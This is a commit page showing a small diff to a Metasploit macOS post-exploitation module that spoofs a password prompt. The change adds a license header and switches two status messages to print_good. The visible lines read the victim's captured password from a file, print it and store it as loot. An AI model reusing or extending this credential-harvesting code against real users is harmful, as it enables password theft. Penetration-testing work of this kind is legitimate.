Skip to content

Commit 919e0d1

Browse files
committed
MSF license, make use of print_good
1 parent e185665 commit 919e0d1

File tree

1 file changed

+9
-2
lines changed

1 file changed

+9
-2
lines changed

modules/post/osx/gather/password_prompt_spoof.rb

Lines changed: 9 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,10 @@
1+
##
2+
# This file is part of the Metasploit Framework and may be subject to
3+
# redistribution and commercial restrictions. Please see the Metasploit
4+
# Framework web site for more information on licensing and terms of use.
5+
# http://metasploit.com/framework/
6+
##
7+
18
require 'msf/core'
29
require 'rex'
310
require 'msf/core/post/common'
@@ -109,9 +116,9 @@ def run
109116

110117
if pass_found
111118
password_data = read_file("#{pass_file}").strip
112-
print_status("password file contents: #{password_data}")
119+
print_good("password file contents: #{password_data}")
113120
passf = store_loot("password", "text/plain", session, password_data, "passwd.pwd", "OSX Password")
114-
print_status("Password data stored as loot in: #{passf}")
121+
print_good("Password data stored as loot in: #{passf}")
115122
else
116123
print_status("Timeout period expired before credentials were entered!")
117124
end

0 commit comments

Comments
 (0)